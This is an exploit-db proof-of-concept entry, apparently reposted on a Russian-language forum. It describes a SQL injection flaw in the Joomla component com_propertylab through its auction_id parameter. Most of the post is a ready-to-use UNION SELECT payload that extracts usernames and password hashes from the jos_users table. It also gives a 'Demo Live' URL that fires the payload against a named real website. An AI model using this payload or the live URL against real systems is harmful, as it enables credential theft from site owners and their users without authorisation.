- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9112
- Проверка EDB
-
- Пройдено
- Автор
- CHIP D3 BI0S
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-07-10
Код:
--------------------------------------------------------------------------
Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
--------------------------------------------------------------------------
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
###################################################
Example:
http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26<Sql Code>
<Sql Code>:
+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
Demo Live (1):
http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
Thanks for all Str0ke
and you are unbeatable :)
+++++++++++++++++++++++++++++++++
[!] Produced in South America
---------------------------------
# milw0rm.com [2009-07-10]- Источник
- www.exploit-db.com
